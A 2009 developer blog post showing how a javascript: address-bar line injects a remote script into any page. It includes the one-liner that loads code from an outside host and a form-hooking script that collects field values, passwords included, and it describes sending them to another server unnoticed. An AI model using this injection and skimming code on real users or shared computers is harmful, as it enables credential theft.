random thoughts, formed in the twisted mind of a coder... RSS 2.0
# Tuesday, 04 August 2009

It's still so simple to hack your way around the internet websites and users. Although the browsers get more secure every release and every update, there will always remain various options to get information from users while they're unaware of it.
Is it because users are ignorant? Or is it because browsers are constantly in a competition between functionality and security? Maybe both...

This post shows how to inject a JavaScript from another domain into any webpage from the addressbar. It can also be injected more automatically, but that's something for another post...

I've tested this particular method on Internet Explorer 8, but I'll bet that almost all other browsers supporting HTML DOM and JavaScript have the same "feature".

If you would execute a line like the following from IE's addressbar...
  javascript:alert(document.body.innerHTML);

...it shows you the HTML source code of the currently loaded page (i.e. http://www.google.com/). In fact it shows you the rendered HTML code. Meaning that, if any script or CSS has altered the HTML sourcecode, it shows you the resuting HTML code.

That it shows you the code of the current page, implies that the javascript: line is evaluated from within the context of that page. Therefore, any JavaScript can be executed in the context of that page... also the insertion of a new script element!

Now, take a look at the following line:
  javascript:var inj=document.body.appendChild(document.createElement('script'));inj.type='text/javascript';inj.src='http://remotescript.com/script.js';alert('site injected');

When executed, it loads a JavaScript from a server in another domain.

To break that up...

First create a new script element and bind it to the body element
  var inj = document.body.appendChild( document.createElement('script') );

Then set the type of the script...
  inj.type = 'text/javascript';

Set the source of the script to a remote server...
  inj.src = 'http://remotescript.com/script.js';

Report that the injection is done...
  alert('site injected');

And on insertion of the foreign script, it's executed immediately and also from within the context of the current page. This foreign script can do everything possible to the page. All without the user knowing what has been altered.

For example, the following script could have been loaded and executed...

//--------------------------------------------------
//inject all forms on the page
for (var idx = 0; idx < document.forms.length; idx++)
{
  var frm = document.forms[idx];
  frm.onsubmit = function() { hacked(frm); };
}
alert("forms injected");

//--------------------------------------------------
//this function is called on form submit
function hacked(frm)
{
  var txt = "";

  for (var idx = 0; idx < frm.childNodes.length; idx++)
  {
    var cld = frm.childNodes[idx];
    if (cld.tagName && cld.tagName.toLowerCase() == "input")
      txt += (cld.name || "[no name]") + ":" + (cld.value || "[no value]") + "\r\n";
  }
  
  alert(txt + "\r\nintercepted!");
}

This script goes through the current page to find all forms and inject them with a function which is executed when a user presses the submit button. Now, when the user does just that, the function goes through all the fields of the form (including password fields) and accumulate them into a string.

In this case, the string is only shown to the user, but any serious hacker would use Ajax to simply post the data (including the URL of the page) to another server and then continue normally with the submit so that the user remains unaware of the hack.

Using the addressbar to inject JavaScript is mainly "useful" on public computers, like library computers, school computers or conference computers.


As a developer you can't do much about this. You could use the onclick event on a button to evaluate the form.submit(); instead of submitting via an <input type="submit"/> (that way the onsubmit event won't fire), but any decent hacker takes that into account.

Tuesday, 04 August 2009 13:52:00 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
Script and HTML | Security
All comments require the approval of the site owner before being displayed.
Name
E-mail
Home page

Comment (HTML not allowed)  

Enter the code shown (prevents robots):

Live Comment Preview
About the author/Disclaimer

Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in any way.

© Copyright 2017
Martijn Thie
Sign In
Statistics
Total Posts: 18
This Year: 0
This Month: 0
This Week: 0
Comments: 177
All Content © 2017, Martijn Thie
DasBlog theme adapted from 'Business' (originally by delarou)